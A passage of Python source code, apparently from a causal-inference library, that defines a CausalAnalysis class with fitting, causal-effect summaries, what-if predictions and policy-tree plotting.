column. If explicit values are provided, the first value is treated as the "control" value for that column
against which other values are compared.
n_jobs: int, default -1
Degree of parallelism to use when training models via joblib.Parallel
verbose : int, default=0
Controls the verbosity when fitting and predicting.
cv: int, cross-validation generator or an iterable, default 5
Determines the strategy for cross-fitting used when training causal models for each feature.
Possible inputs for cv are:
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
mc_iters: int, default 3
The number of times to rerun the first stage models to reduce the variance of the causal model nuisances.
skip_cat_limit_checks: bool, default False
By default, categorical features need to have several instances of each category in order for a model to be
fit robustly. Setting this to True will skip these checks (although at least 2 instances will always be
required for linear heterogeneity models, and 4 for forest heterogeneity models even in that case).
random_state : int, RandomState instance or None, default=None
Controls the randomness of the estimator. The features are always
randomly permuted at each split. When ``max_features < n_features``, the algorithm will
select ``max_features`` at random at each split before finding the best
split among them. But the best found split may vary across different
runs, even if ``max_features=n_features``. That is the case, if the
improvement of the criterion is identical for several splits and one
split has to be selected at random. To obtain a deterministic behaviour
during fitting, ``random_state`` has to be fixed to an integer.
Attributes
----------
nuisance_models_: string
The nuisance models setting used for the most recent call to fit
heterogeneity_model: string
The heterogeneity model setting used for the most recent call to fit
feature_names_: list of string
The list of feature names from the data in the most recent call to fit
trained_feature_indices_: list of int
The list of feature indices where models were trained successfully
untrained_feature_indices_: list of tuple of (int, string or Exception)
The list of indices that were requested but not able to be trained succesfully,
along with either a reason or caught Exception for each
"""
def __init__(self, feature_inds, categorical, heterogeneity_inds=None, feature_names=None, classification=False,
upper_bound_on_cat_expansion=5, nuisance_models='linear', heterogeneity_model='linear', *,
categories='auto', n_jobs=-1, verbose=0, cv=5, mc_iters=3, skip_cat_limit_checks=False,
random_state=None):
self.feature_inds = feature_inds
self.categorical = categorical
self.heterogeneity_inds = heterogeneity_inds
self.feature_names = feature_names
self.classification = classification
self.upper_bound_on_cat_expansion = upper_bound_on_cat_expansion
self.nuisance_models = nuisance_models
self.heterogeneity_model = heterogeneity_model
self.categories = categories
self.n_jobs = n_jobs
self.verbose = verbose
self.cv = cv
self.mc_iters = mc_iters
self.skip_cat_limit_checks = skip_cat_limit_checks
self.random_state = random_state
def fit(self, X, y, warm_start=False):
"""
Fits global and local causal effect models for each feature in feature_inds on the data
Parameters
----------
X : array-like
Feature data
y : array-like of shape (n,) or (n,1)
Outcome. If classification=True, then y should take two values. Otherwise an error is raised
that only binary classification is implemented for now.
TODO. enable multi-class classification for y (post-MVP)
warm_start : boolean, default False
If False, train models for each feature in `feature_inds`.
If True, train only models for features in `feature_inds` that had not already been trained by
the previous call to `fit`, and for which neither the corresponding heterogeneity_inds, nor the
automl flag have changed. If heterogeneity_inds have changed, then the final stage model of these features
will be refit. If the automl flag has changed, then whole model is refit, despite the warm start flag.
"""
# Validate inputs
assert self.nuisance_models in ['automl', 'linear'], (
"The only supported nuisance models are 'linear' and 'automl', "
f"but was given {self.nuisance_models}")
assert self.heterogeneity_model in ['linear', 'forest'], (
"The only supported heterogeneity models are 'linear' and 'forest' but received "
f"{self.heterogeneity_model}")
assert np.ndim(X) == 2, f"X must be a 2-dimensional array, but here had shape {np.shape(X)}"
assert iterable(self.feature_inds), f"feature_inds should be array-like, but got {self.feature_inds}"
assert iterable(self.categorical), f"categorical should be array-like, but got {self.categorical}"
assert self.heterogeneity_inds is None or iterable(self.heterogeneity_inds), (
f"heterogeneity_inds should be None or array-like, but got {self.heterogeneity_inds}")
assert self.feature_names is None or iterable(self.feature_names), (
f"feature_names should be None or array-like, but got {self.feature_names}")
assert self.categories == 'auto' or iterable(self.categories), (
f"categories should be 'auto' or array-like, but got {self.categories}")
# TODO: check compatibility of X and Y lengths
if warm_start:
if not hasattr(self, "_results"):
# no previous fit, cancel warm start
warm_start = False
elif self._d_x != X.shape[1]:
raise ValueError(
f"Can't warm start: previous X had {self._d_x} columns, new X has {X.shape[1]} columns")
# work with numeric feature indices, so that we can easily compare with categorical ones
train_inds = _get_column_indices(X, self.feature_inds)
if len(train_inds) == 0:
raise ValueError(
"No features specified. At least one feature index must be specified so that a model can be trained.")
heterogeneity_inds = self.heterogeneity_inds
if heterogeneity_inds is None:
heterogeneity_inds = [None for ind in train_inds]
# if heterogeneity_inds is 1D, repeat it
if heterogeneity_inds == [] or isinstance(heterogeneity_inds[0], (int, str, bool)):
heterogeneity_inds = [heterogeneity_inds for _ in train_inds]
# heterogeneity inds should be a 2D list of length same as train_inds
elif heterogeneity_inds is not None and len(heterogeneity_inds) != len(train_inds):
raise ValueError("Heterogeneity indexes should have the same number of entries, but here "
f" there were {len(heterogeneity_inds)} heterogeneity entries but "
f" {len(train_inds)} feature indices.")
# replace None elements of heterogeneity_inds and ensure indices are numeric
heterogeneity_inds = {ind: list(range(X.shape[1])) if hinds is None else _get_column_indices(X, hinds)
for ind, hinds in zip(train_inds, heterogeneity_inds)}
if warm_start:
train_y_model = False
if self.nuisance_models != self.nuisance_models_:
warnings.warn("warm_start will be ignored since the nuisance models have changed "
f"from {self.nuisance_models_} to {self.nuisance_models} since the previous call to fit")
warm_start = False
train_y_model = True
if self.heterogeneity_model != self.heterogeneity_model_:
warnings.warn("warm_start will be ignored since the heterogeneity model has changed "
f"from {self.heterogeneity_model_} to {self.heterogeneity_model} "
"since the previous call to fit")
warm_start = False
# TODO: bail out also if categorical columns, classification, random_state changed?
else:
train_y_model = True
# TODO: should we also train a new model_y under any circumstances when warm_start is True?
if warm_start:
new_inds = [ind for ind in train_inds if (ind not in self._cache or
heterogeneity_inds[ind] != self._cache[ind][1].hinds)]
else:
new_inds = list(train_inds)
self._cache = {} # store mapping from feature to insights, results
# train the Y model
if train_y_model:
# perform model selection for the Y model using all X, not on a per-column basis
allX = ColumnTransformer([('encode',
OneHotEncoder(
drop='first', sparse=False),
self.categorical)],
remainder=StandardScaler()).fit_transform(X)
if self.verbose > 0:
print("CausalAnalysis: performing model selection on overall Y model")
if self.classification:
self._model_y = _first_stage_clf(allX, y, automl=self.nuisance_models == 'automl',
make_regressor=True,
random_state=self.random_state, verbose=self.verbose)
else:
self._model_y = _first_stage_reg(allX, y, automl=self.nuisance_models == 'automl',
random_state=self.random_state, verbose=self.verbose)
if self.classification:
# now that we've trained the classifier and wrapped it, ensure that y is transformed to
# work with the regression wrapper
# we use column_or_1d to treat pd.Series and pd.DataFrame objects the same way as arrays
y = column_or_1d(y).reshape(-1, 1)
# note that this needs to happen after wrapping to generalize to the multi-class case,
# since otherwise we'll have too many columns to be able to train a classifier
y = OneHotEncoder(drop='first', sparse=False).fit_transform(y)
assert y.ndim == 1 or y.shape[1] == 1, ("Multiclass classification isn't supported" if self.classification
else "Only a single outcome is supported")
self._vec_y = y.ndim == 1
self._d_x = X.shape[1]
# start with empty results and default shared insights
self._results = []
self._shared = _get_default_shared_insights_output()
self._shared[_CausalInsightsConstants.InitArgsKey] = {
'feature_inds': _sanitize(self.feature_inds),
'categorical': _sanitize(self.categorical),
'heterogeneity_inds': _sanitize(self.heterogeneity_inds),
'feature_names': _sanitize(self.feature_names),
'classification': _sanitize(self.classification),
'upper_bound_on_cat_expansion': _sanitize(self.upper_bound_on_cat_expansion),
'nuisance_models': _sanitize(self.nuisance_models),
'heterogeneity_model': _sanitize(self.heterogeneity_model),
'categories': _sanitize(self.categories),
'n_jobs': _sanitize(self.n_jobs),
'verbose': _sanitize(self.verbose),
'random_state': _sanitize(self.random_state)
}
# convert categorical indicators to numeric indices
categorical_inds = _get_column_indices(X, self.categorical)
categories = self.categories
if categories == 'auto':
categories = ['auto' for _ in categorical_inds]
else:
assert len(categories) == len(categorical_inds), (
"If categories is not 'auto', it must contain one entry per categorical column. Instead, categories"
f"has length {len(categories)} while there are {len(categorical_inds)} categorical columns.")
# check for indices over the categorical expansion bound
invalid_inds = getattr(self, 'untrained_feature_indices_', [])
# assume we'll be able to train former failures this time; we'll add them back if not
invalid_inds = [(ind, reason) for (ind, reason) in invalid_inds if ind not in new_inds]
self._has_column_names = True
if self.feature_names is None:
if hasattr(X, "iloc"):
feature_names = X.columns
else:
self._has_column_names = False
feature_names = [f"x{i}" for i in range(X.shape[1])]
else:
feature_names = self.feature_names
self.feature_names_ = feature_names
min_counts = {}
for ind in new_inds:
column_text = self._format_col(ind)
if ind in categorical_inds:
cats, counts = np.unique(_safe_indexing(X, ind, axis=1), return_counts=True)
min_ind = np.argmin(counts)
n_cat = len(cats)
if n_cat > self.upper_bound_on_cat_expansion:
warnings.warn(f"{column_text} has more than {self.upper_bound_on_cat_expansion} "
f"values (found {n_cat}) so no heterogeneity model will be fit for it; "
"increase 'upper_bound_on_cat_expansion' to change this behavior.")
# can't remove in place while iterating over new_inds, so store in separate list
invalid_inds.append((ind, 'upper_bound_on_cat_expansion'))
elif counts[min_ind] < _CAT_LIMIT:
if self.skip_cat_limit_checks and (counts[min_ind] >= 5 or
(counts[min_ind] >= 2 and
self.heterogeneity_model != 'forest')):
# train the model, but warn
warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "
f"the training dataset, which is less than the lower limit ({_CAT_LIMIT}). "
"A model will still be fit because 'skip_cat_limit_checks' is True, "
"but this model may not be robust.")
min_counts[ind] = counts[min_ind]
elif counts[min_ind] < 2 or (counts[min_ind] < 5 and self.heterogeneity_model == 'forest'):
# no model can be trained in this case since we need more folds
warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "
"the training dataset, but linear heterogeneity models need at least 2 and "
"forest heterogeneity models need at least 5 instances, so no model will be fit "
"for this column")
invalid_inds.append((ind, 'cat_limit'))
else:
# don't train a model, but suggest workaround since there are enough instances of least
# populated class
warnings.warn(f"{column_text}'s value {cats[min_ind]} has only {counts[min_ind]} instances in "
f"the training dataset, which is less than the lower limit ({_CAT_LIMIT}), "
"so no heterogeneity model will be fit for it. This check can be turned off by "
"setting 'skip_cat_limit_checks' to True, but that may result in an inaccurate "
"model for this feature.")
invalid_inds.append((ind, 'cat_limit'))
for (ind, _) in invalid_inds:
new_inds.remove(ind)
# also remove from train_inds so we don't try to access the result later
train_inds.remove(ind)
if len(train_inds) == 0:
raise ValueError("No features remain; increase the upper_bound_on_cat_expansion and ensure that there "
"are several instances of each categorical value so that at least "
"one feature model can be trained.")
# extract subset of names matching new columns
new_feat_names = _safe_indexing(feature_names, new_inds)
cache_updates = dict(zip(new_inds,
joblib.Parallel(
n_jobs=self.n_jobs,
verbose=self.verbose
)(joblib.delayed(_process_feature)(
feat_name, feat_ind,
self.verbose, categorical_inds, categories, heterogeneity_inds, min_counts, y, X,
self.nuisance_models, self.heterogeneity_model, self.random_state, self._model_y,
self.cv, self.mc_iters)
for feat_name, feat_ind in zip(new_feat_names, new_inds))))
# track indices where an exception was thrown, since we can't remove from dictionary while iterating
inds_to_remove = []
for ind, value in cache_updates.items():
if isinstance(value, Exception):
# don't want to cache this failed result
inds_to_remove.append(ind)
train_inds.remove(ind)
invalid_inds.append((ind, value))
for ind in inds_to_remove:
del cache_updates[ind]
self._cache.update(cache_updates)
for ind in train_inds:
dict_update, result = self._cache[ind]
self._results.append(result)
for k in dict_update:
self._shared[k] += dict_update[k]
invalid_inds.sort()
self.untrained_feature_indices_ = invalid_inds
self.trained_feature_indices_ = train_inds
self.nuisance_models_ = self.nuisance_models
self.heterogeneity_model_ = self.heterogeneity_model
return self
def _format_col(self, ind):
if self._has_column_names:
return f"Column {ind} ({self.feature_names_[ind]})"
else:
return f"Column {ind}"
# properties to return from effect InferenceResults
@staticmethod
def _point_props(alpha):
return [(_CausalInsightsConstants.PointEstimateKey, 'point_estimate'),
(_CausalInsightsConstants.StandardErrorKey, 'stderr'),
(_CausalInsightsConstants.ZStatKey, 'zstat'),
(_CausalInsightsConstants.PValueKey, 'pvalue'),
(_CausalInsightsConstants.ConfidenceIntervalLowerKey, lambda inf: inf.conf_int(alpha=alpha)[0]),
(_CausalInsightsConstants.ConfidenceIntervalUpperKey, lambda inf: inf.conf_int(alpha=alpha)[1])]
# properties to return from PopulationSummaryResults
@staticmethod
def _summary_props(alpha):
return [(_CausalInsightsConstants.PointEstimateKey, 'mean_point'),
(_CausalInsightsConstants.StandardErrorKey, 'stderr_mean'),
(_CausalInsightsConstants.ZStatKey, 'zstat'),
(_CausalInsightsConstants.PValueKey, 'pvalue'),
(_CausalInsightsConstants.ConfidenceIntervalLowerKey, lambda inf: inf.conf_int_mean(alpha=alpha)[0]),
(_CausalInsightsConstants.ConfidenceIntervalUpperKey, lambda inf: inf.conf_int_mean(alpha=alpha)[1])]
# Converts strings to property lookups or method calls as a convenience so that the
# _point_props and _summary_props above can be applied to an inference object
@staticmethod
def _make_accessor(attr):
if isinstance(attr, str):
s = attr
def attr(o):
val = getattr(o, s)
if callable(val):
return val()
else:
return val
return attr
# Create a summary combining all results into a single output; this is used
# by the various causal_effect and causal_effect_dict methods to generate either a dataframe
# or a dictionary, respectively, based on the summary function passed into this method
def _summarize(self, *, summary, get_inference, props, expand_arr, drop_sample):
assert hasattr(self, "_results"), "This object has not been fit, so cannot get results"
# ensure array has shape (m,y,t)
def ensure_proper_dims(arr):
if expand_arr:
# population summary is missing sample dimension; add it for consistency
arr = np.expand_dims(arr, 0)
if self._vec_y:
# outcome dimension is missing; add it for consistency
arr = np.expand_dims(arr, axis=1)
assert 2 <= arr.ndim <= 3
# add singleton treatment dimension if missing
return arr if arr.ndim == 3 else np.expand_dims(arr, axis=2)
# store set of inference results so we don't need to recompute per-attribute below in summary/coalesce
infs = [get_inference(res) for res in self._results]
# each attr has dimension (m,y) or (m,y,t)
def coalesce(attr):
"""Join together the arrays for each feature"""
attr = self._make_accessor(attr)
# concatenate along treatment dimension
arr = np.concatenate([ensure_proper_dims(attr(inf))
for inf in infs], axis=2)
# for dictionary representation, want to remove unneeded sample dimension
# in cohort and global results
if drop_sample:
arr = np.squeeze(arr, 0)
return arr
return summary([(key, coalesce(val)) for key, val in props])
def _pandas_summary(self, get_inference, *, props, n,
expand_arr=False, keep_all_levels=False):
"""
Summarizes results into a dataframe.
Parameters
----------
get_inference : lambda
Method to get the relevant inference results from each result object
props : list of (string, string or lambda)
Set of column names and ways to get the corresponding values from the inference object
n : int
The number of samples in the dataset
expand_arr : boolean, default False
Whether to add a synthetic sample dimension to the result arrays when performing internal computations
keep_all_levels : boolean, default False
Whether to keep all levels, even when they don't take on more than one value;
Note that regardless of this argument the "sample" level will only be present if expand_arr is False
"""
def make_dataframe(props):
to_include = OrderedDict([(key, value.reshape(-1))
for key, value in props])
# TODO: enrich outcome logic for multi-class classification when that is supported
index = pd.MultiIndex.from_tuples([(i, outcome, res.feature_name, f"{lvl}v{res.feature_baseline}"
if res.feature_baseline is not None
else lvl)
for i in range(n)
for outcome in ["y0"]
for res in self._results
for lvl in res.feature_levels],
names=["sample", "outcome", "feature", "feature_value"])
if expand_arr:
# There is no actual sample level in this data
index = index.droplevel("sample")
if not keep_all_levels:
for lvl in index.levels:
if len(lvl) == 1:
if not isinstance(index, pd.MultiIndex):
# can't drop only level
index = pd.Index([self._results[0].feature_name], name="feature")
else:
index = index.droplevel(lvl.name)
return pd.DataFrame(to_include, index=index)
return self._summarize(summary=make_dataframe,
get_inference=get_inference,
props=props,
expand_arr=expand_arr,
drop_sample=False) # dropping the sample dimension is handled above instead
def _dict_summary(self, get_inference, *, n, props, kind, drop_sample=False, expand_arr=False, row_wise=False):
"""
Summarizes results into a dictionary.
Parameters
----------
get_inference : lambda
Method to get the relevant inference results from each result object
n : int
The number of samples in the dataset
props : list of (string, string or lambda)
Set of column names and ways to get the corresponding values from the inference object
kind : string
The kind of inference results to get (e.g. 'global', 'local', or 'cohort')
drop_sample : boolean, default False
Whether to drop the sample dimension from each array
expand_arr : boolean, default False
Whether to add an initial sample dimension to the result arrays
row_wise : boolean, default False
Whether to return a list of dictionaries (one dictionary per row) instead of
a dictionary of lists (one list per column)
"""
def make_dict(props):
# should be serialization-ready and contain no numpy arrays
res = _get_default_specific_insights(kind)
shared = self._shared
if row_wise:
row_data = {}
# remove entries belonging to row data, since we're including them in the list of nested dictionaries
for k in _get_data_causal_insights_keys():
del res[k]
shared = shared.copy() # copy so that we can modify without affecting shared state
# TODO: Note that there's no column metadata for the sample number - should there be?
for k in _get_column_causal_insights_keys():
# need to replicate the column info for each sample, then remove from the shared data
row_data[k] = shared[k] * n
del shared[k]
# NOTE: the flattened order has the ouptut dimension before the feature dimension
# which may need to be revisited once we support multiclass
row_data.update([(key, value.flatten()) for key, value in props])
# get the length of the list corresponding to the first dictionary key
# `list(row_data)` gets the keys as a list, since `row_data.keys()` can't be indexed into
n_rows = len(row_data[list(row_data)[0]])
res[_CausalInsightsConstants.RowData] = [{key: row_data[key][i]
for key in row_data} for i in range(n_rows)]
else:
res.update([(key, value.tolist()) for key, value in props])
return {**shared, **res}
return self._summarize(summary=make_dict,
get_inference=get_inference,
props=props,
expand_arr=expand_arr,
drop_sample=drop_sample)
def global_causal_effect(self, *, alpha=0.05, keep_all_levels=False):
"""
Get the global causal effect for each feature as a pandas DataFrame.
Parameters
----------
alpha : float, default 0.05
The confidence level of the confidence interval
keep_all_levels : bool, default False
Whether to keep all levels of the output dataframe ('outcome', 'feature', and 'feature_level')
even if there was only a single value for that level; by default single-valued levels are dropped.
Returns
-------
global_effects : pandas Dataframe
DataFrame with the following structure:
:Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper']
:Index: ['feature', 'feature_value']
:Rows: For each feature that is numerical, we have an entry with index ['{feature_name}', 'num'], where
'num' is literally the string 'num' and feature_name is the input feature name.
For each feature that is categorical, we have an entry with index ['{feature_name}',
'{cat}v{base}'] where cat is the category value and base is the category used as baseline.
If all features are numerical then the feature_value index is dropped in the dataframe, but not
in the serialized dict.
"""
# a global inference indicates the effect of that one feature on the outcome
return self._pandas_summary(lambda res: res.global_inference, props=self._point_props(alpha),
n=1, expand_arr=True, keep_all_levels=keep_all_levels)
def _global_causal_effect_dict(self, *, alpha=0.05, row_wise=False):
"""
Gets the global causal effect for each feature as dictionary.
Dictionary entries for predictions, etc. will be nested lists of shape (d_y, sum(d_t))
Only for serialization purposes to upload to AzureML
"""
return self._dict_summary(lambda res: res.global_inference, props=self._point_props(alpha),
kind='global', n=1, row_wise=row_wise, drop_sample=True, expand_arr=True)
def _cohort_effect_inference(self, Xtest):
assert np.ndim(Xtest) == 2 and np.shape(Xtest)[1] == self._d_x, (
"Shape of Xtest must be compatible with shape of X, "
f"but got shape {np.shape(Xtest)} instead of (n, {self._d_x})"
)
def inference_from_result(result):
est = result.estimator
X = result.X_transformer.transform(Xtest)
if X.shape[1] == 0:
X = None
return est.const_marginal_ate_inference(X=X)
return inference_from_result
def cohort_causal_effect(self, Xtest, *, alpha=0.05, keep_all_levels=False):
"""
Gets the average causal effects for a particular cohort defined by a population of X's.
Parameters
----------
Xtest : array-like
The cohort samples for which to return the average causal effects within cohort
alpha : float, default 0.05
The confidence level of the confidence interval
keep_all_levels : bool, default False
Whether to keep all levels of the output dataframe ('outcome', 'feature', and 'feature_level')
even if there was only a single value for that level; by default single-valued levels are dropped.
Returns
-------
cohort_effects : pandas Dataframe
DataFrame with the following structure:
:Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper']
:Index: ['feature', 'feature_value']
:Rows: For each feature that is numerical, we have an entry with index ['{feature_name}', 'num'], where
'num' is literally the string 'num' and feature_name is the input feature name.
For each feature that is categorical, we have an entry with index ['{feature_name}', '{cat}v{base}']
where cat is the category value and base is the category used as baseline.
If all features are numerical then the feature_value index is dropped in the dataframe, but not
in the serialized dict.
"""
return self._pandas_summary(self._cohort_effect_inference(Xtest),
props=self._summary_props(alpha), n=1,
expand_arr=True, keep_all_levels=keep_all_levels)
def _cohort_causal_effect_dict(self, Xtest, *, alpha=0.05, row_wise=False):
"""
Gets the cohort causal effects for each feature as dictionary.
Dictionary entries for predictions, etc. will be nested lists of shape (d_y, sum(d_t))
Only for serialization purposes to upload to AzureML
"""
return self._dict_summary(self._cohort_effect_inference(Xtest), props=self._summary_props(alpha),
kind='cohort', n=1, row_wise=row_wise, expand_arr=True, drop_sample=True)
def _local_effect_inference(self, Xtest):
assert np.ndim(Xtest) == 2 and np.shape(Xtest)[1] == self._d_x, (
"Shape of Xtest must be compatible with shape of X, "
f"but got shape {np.shape(Xtest)} instead of (n, {self._d_x})"
)
def inference_from_result(result):
est = result.estimator
X = result.X_transformer.transform(Xtest)
if X.shape[1] == 0:
X = None
eff = est.const_marginal_effect_inference(X=X)
if X is None:
# need to reshape the output to match the input
eff = eff._expand_outputs(Xtest.shape[0])
return eff
return inference_from_result
def local_causal_effect(self, Xtest, *, alpha=0.05, keep_all_levels=False):
"""
Gets the local causal effect for each feature as a pandas DataFrame.
Parameters
----------
Xtest : array-like
The samples for which to return the causal effects
alpha : float, default 0.05
The confidence level of the confidence interval
keep_all_levels : bool, default False
Whether to keep all levels of the output dataframe ('sample', 'outcome', 'feature', and 'feature_level')
even if there was only a single value for that level; by default single-valued levels are dropped.
Returns
-------
global_effect : pandas Dataframe
DataFrame with the following structure:
:Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper']
:Index: ['sample', 'feature', 'feature_value']
:Rows: For each feature that is numeric, we have an entry with index
['{sampleid}', '{feature_name}', 'num'],
where 'num' is literally the string 'num' and feature_name is the input feature name and sampleid is
the index of the sample in Xtest.
For each feature that is categorical, we have an entry with index
['{sampleid', '{feature_name}', '{cat}v{base}']
where cat is the category value and base is the category used as baseline.
If all features are numerical then the feature_value index is dropped in the dataframe, but not
in the serialized dict.
"""
return self._pandas_summary(self._local_effect_inference(Xtest),
props=self._point_props(alpha), n=Xtest.shape[0], keep_all_levels=keep_all_levels)
def _local_causal_effect_dict(self, Xtest, *, alpha=0.05, row_wise=False):
"""
Gets the local feature importance as dictionary
Dictionary entries for predictions, etc. will be nested lists of shape (n_rows, d_y, sum(d_t))
Only for serialization purposes to upload to AzureML
"""
return self._dict_summary(self._local_effect_inference(Xtest), props=self._point_props(alpha),
kind='local', n=Xtest.shape[0], row_wise=row_wise)
def _safe_result_index(self, X, feature_index):
assert hasattr(self, "_results"), "This instance has not yet been fitted"
assert np.ndim(X) == 2 and np.shape(X)[1] == self._d_x, (
"Shape of X must be compatible with shape of the fitted X, "
f"but got shape {np.shape(X)} instead of (n, {self._d_x})"
)
(numeric_index,) = _get_column_indices(X, [feature_index])
bad_inds = dict(self.untrained_feature_indices_)
if numeric_index in bad_inds:
error = bad_inds[numeric_index]
col_text = self._format_col(numeric_index)
if error == 'cat_limit':
msg = f"{col_text} had a value with fewer than {_CAT_LIMIT} occurences, so no model was fit for it"
elif error == 'upper_bound_on_cat_expansion':
msg = (f"{col_text} had more distinct values than the setting of 'upper_bound_on_cat_expansion', "
"so no model was fit for it")
else:
msg = (f"{col_text} generated the following error during fitting, "
f"so no model was fit for it:\n{str(error)}")
raise ValueError(msg)
if numeric_index not in self.trained_feature_indices_:
raise ValueError(f"{self._format_col(numeric_index)} was not passed as a feature index "
"so no model was fit for it")
results = [res for res in self._results
if res.feature_index == numeric_index]
assert len(results) == 1
(result,) = results
return result
def _whatif_inference(self, X, Xnew, feature_index, y):
assert not self.classification, "What-if analysis cannot be applied to classification tasks"
assert np.shape(X)[0] == np.shape(Xnew)[0] == np.shape(y)[0], (
"X, Xnew, and y must have the same length, but have shapes "
f"{np.shape(X)}, {np.shape(Xnew)}, and {np.shape(y)}"
)
assert np.size(feature_index) == 1, f"Only one feature index may be changed, but got {np.size(feature_index)}"
T0 = _safe_indexing(X, feature_index, axis=1)
T1 = Xnew
result = self._safe_result_index(X, feature_index)
X = result.X_transformer.transform(X)
if X.shape[1] == 0:
X = None
inf = result.estimator.effect_inference(X=X, T0=T0, T1=T1)
# we want to offset the inference object by the baseline estimate of y
inf.translate(y)
return inf
def whatif(self, X, Xnew, feature_index, y, *, alpha=0.05):
"""
Get counterfactual predictions when feature_index is changed to Xnew from its observational counterpart.
Note that this only applies to regression use cases; for classification what-if analysis is not supported.
Parameters
----------
X: array-like
Features
Xnew: array-like
New values of a single column of X
feature_index: int or string
The index of the feature being varied to Xnew, either as a numeric index or
the string name if the input is a dataframe
y: array-like
Observed labels or outcome of a predictive model for baseline y values
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
Returns
-------
y_new: DataFrame
The predicted outputs that would have been observed under the counterfactual features
"""
return self._whatif_inference(X, Xnew, feature_index, y).summary_frame(alpha=alpha)
def _whatif_dict(self, X, Xnew, feature_index, y, *, alpha=0.05, row_wise=False):
"""
Get counterfactual predictions when feature_index is changed to Xnew from its observational counterpart.
Note that this only applies to regression use cases; for classification what-if analysis is not supported.
Parameters
----------
X: array-like
Features
Xnew: array-like
New values of a single column of X
feature_index: int or string
The index of the feature being varied to Xnew, either as a numeric index or
the string name if the input is a dataframe
y: array-like
Observed labels or outcome of a predictive model for baseline y values
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
row_wise : boolean, default False
Whether to return a list of dictionaries (one dictionary per row) instead of
a dictionary of lists (one list per column)
Returns
-------
dict : dict
The counterfactual predictions, as a dictionary
"""
inf = self._whatif_inference(X, Xnew, feature_index, y)
props = self._point_props(alpha=alpha)
res = _get_default_specific_insights('whatif')
if row_wise:
row_data = {}
# remove entries belonging to row data, since we're including them in the list of nested dictionaries
for k in _get_data_causal_insights_keys():
del res[k]
row_data.update([(key, self._make_accessor(attr)(inf).flatten()) for key, attr in props])
# get the length of the list corresponding to the first dictionary key
# `list(row_data)` gets the keys as a list, since `row_data.keys()` can't be indexed into
n_rows = len(row_data[list(row_data)[0]])
res[_CausalInsightsConstants.RowData] = [{key: row_data[key][i]
for key in row_data} for i in range(n_rows)]
else:
res.update([(key, self._make_accessor(attr)(inf).tolist()) for key, attr in props])
return res
def _tree(self, is_policy, Xtest, feature_index, *, treatment_costs=0,
max_depth=3, min_samples_leaf=2, min_impurity_decrease=1e-4,
include_model_uncertainty=False, alpha=0.05):
result = self._safe_result_index(Xtest, feature_index)
Xtest = result.X_transformer.transform(Xtest)
if Xtest.shape[1] == 0:
Xtest = None
if result.feature_baseline is None:
treatment_names = ['decrease', 'increase']
else:
treatment_names = [f"{result.feature_baseline}"] + \
[f"{lvl}" for lvl in result.feature_levels]
TreeType = SingleTreePolicyInterpreter if is_policy else SingleTreeCateInterpreter
intrp = TreeType(include_model_uncertainty=include_model_uncertainty,
uncertainty_level=alpha,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_impurity_decrease,
random_state=self.random_state)
if is_policy:
intrp.interpret(result.estimator, Xtest,
sample_treatment_costs=treatment_costs)
if result.feature_baseline is None: # continuous treatment, so apply a treatment level 10% of typical
treatment_level = result.treatment_value * 0.1
# NOTE: this calculation is correct only if treatment costs are marginal costs,
# because then scaling the difference between treatment value and treatment costs is the
# same as scaling the treatment value and subtracting the scaled treatment cost.
#
# Note also that unlike the standard outputs of the SinglePolicyTreeInterpreter, for
# continuous treatments, the policy value should include the benefit of decreasing treatments
# (rather than just not treating at all)
#
# We can get the total by seeing that if we restrict attention to units where we would treat,
# 2 * policy_value - always_treat
# includes exactly their contribution because policy_value and always_treat both include it
# and likewise restricting attention to the units where we want to decrease treatment,
# 2 * policy_value - always-treat
# also computes the *benefit* of decreasing treatment, because their contribution to policy_value
# is zero and the contribution to always_treat is negative
treatment_total = (2 * intrp.policy_value_ - intrp.always_treat_value_.item()) * treatment_level
always_totals = intrp.always_treat_value_ * treatment_level
else:
treatment_total = intrp.policy_value_
always_totals = intrp.always_treat_value_
policy_values = treatment_total, always_totals
else: # no policy values for CATE trees
intrp.interpret(result.estimator, Xtest)
policy_values = None
return intrp, result.X_transformer.get_feature_names(self.feature_names_), treatment_names, policy_values
# TODO: it seems like it would be better to just return the tree itself rather than plot it;
# however, the tree can't store the feature and treatment names we compute here...
def plot_policy_tree(self, Xtest, feature_index, *, treatment_costs=0,
max_depth=3, min_samples_leaf=2, min_value_increase=1e-4, include_model_uncertainty=False,
alpha=0.05):
"""
Plot a recommended policy tree using matplotlib.
Parameters
----------
X : array-like
Features
feature_index
Index of the feature to be considered as treament
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per
unit of treatment; for discrete features, this is the difference in cost between each of the non-default
values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1))
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_value_increase : float, default 1e-4
The minimum increase in the policy value that a split needs to create to construct it
include_model_uncertainty : bool, default False
Whether to include confidence interval information when building a simplified model of the cate model.
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
"""
intrp, feature_names, treatment_names, _ = self._tree(True, Xtest, feature_index,
treatment_costs=treatment_costs,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_value_increase,
include_model_uncertainty=include_model_uncertainty,
alpha=alpha)
return intrp.plot(feature_names=feature_names, treatment_names=treatment_names)
def _policy_tree_output(self, Xtest, feature_index, *, treatment_costs=0,
max_depth=3, min_samples_leaf=2, min_value_increase=1e-4, alpha=0.05):
"""
Get a tuple of policy outputs.
The first item in the tuple is the recommended policy tree expressed as a dictionary.
The second item is the per-unit-average value of applying the learned policy; if the feature is continuous this
